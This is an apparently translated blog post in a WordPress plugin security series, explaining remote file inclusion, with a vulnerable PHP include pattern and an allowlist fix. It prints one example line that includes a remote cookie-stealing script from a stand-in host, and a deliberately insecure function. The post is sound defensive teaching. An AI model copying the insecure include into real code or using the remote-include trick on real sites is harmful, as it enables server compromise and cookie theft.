This week I started a series on WordPress plugin security. We established that the golden rule of web security is to check the "gateways": to monitor the areas of a website that an attacker could use to send data to it. Today I would like to delve deeper into this.
WordPress support expert Podz asks on his blog, "What is dangerous?"
The answer lies in understanding the attack vectors. Attack vectors such as Cross-Site Scripting, SQL Injection and Remote File Inclusion are among the most common methods used to attack a website. If you understand the principles they are based on, you will have a much better idea of what to look for in a plugin. So let's get to it, shall we?
Cross-Site Scripting (XSS)
Remote File Inclusion
A third attack vector that must be avoided is remote file inclusion (RFI). It consists of using a PHP function (include(), documented at http://us2.php.net/include) to pull in a piece of code hosted on any site and execute it on the server that includes it. In other words, an attacker can write a small script that logs IP addresses, cookies, etc., and if they can get your site to include that PHP script, it hands valuable information to the attacker. RFI is usually found where user input (a form, the address bar) is placed directly into an include().
For example, a link like this one: http://example.com/?page=about could have some code behind it that serves up the right content.
This kind of sloppy code is more common than you might imagine. The developer's intention, in this example, might be to include the contents of about.php in the main page. But what happens if the page parameter is sent with a URL in it instead of a page name? Then your page would actually be executing this:
<?php include("http://mydomain.com/script_lectura_cookie_maliciosa.php"); ?>
A very dangerous issue.
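To make the point concrete, here is the sloppy pattern described above placed next to a hardened version. This is an added example, not code from the original article; the function names, the pages/ directory and the allowlist contents are assumptions made for the illustration.

```php
<?php
// Added example (not from the original article). Shows the ?page= parameter
// flowing straight into include(), and an allowlist that prevents it.

// --- Vulnerable pattern: the request decides what gets included. ---
function render_page_vulnerable(array $get): void
{
    $page = $get['page'] ?? 'home';
    // With allow_url_include enabled, a URL in ?page= makes PHP fetch and
    // execute remote code. Even with it disabled, this still allows local
    // file inclusion via ../ sequences.
    include($page . '.php');
}

// --- Hardened pattern: map user input onto a fixed allowlist. ---
// Constructed allowlist; a real site would list its own templates here.
const ALLOWED_PAGES = [
    'home'  => 'home.php',
    'about' => 'about.php',
];

function resolve_page(?string $requested): string
{
    $requested = $requested ?? 'home';
    // Only an exact allowlist key is accepted. A URL, a path or a
    // null byte never matches, so it can never reach include().
    if (!array_key_exists($requested, ALLOWED_PAGES)) {
        return ALLOWED_PAGES['home'];
    }
    return ALLOWED_PAGES[$requested];
}

function render_page_hardened(array $get): void
{
    // The included path is built from our own constant, never from input.
    // 'pages/' is an assumed directory for this example.
    $file = __DIR__ . '/pages/' . resolve_page($get['page'] ?? null);
    include $file;
}

// Constructed requests: 'about' resolves to about.php, while a remote URL
// is rejected and silently falls back to home.php.
echo resolve_page('about') . "\n";
echo resolve_page('http://mydomain.com/script_lectura_cookie_maliciosa.php') . "\n";
```

As a defensive check, keeping allow_url_include off in php.ini removes the remote half of the problem entirely, but only the allowlist removes the local one.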
How does this affect WordPress?
In the following articles in this series we will look at the security implications specific to WordPress plugins. Any plugin you use should first be inspected to see whether it allows interaction with the user. If it allows user interaction, it may be prone to one of these attack vectors.
Do not assume, however, that a plugin that accepts interaction is dangerous. It comes down to the code and the developer handling user input appropriately and securely.
Read the other articles in the series on WordPress plugin security: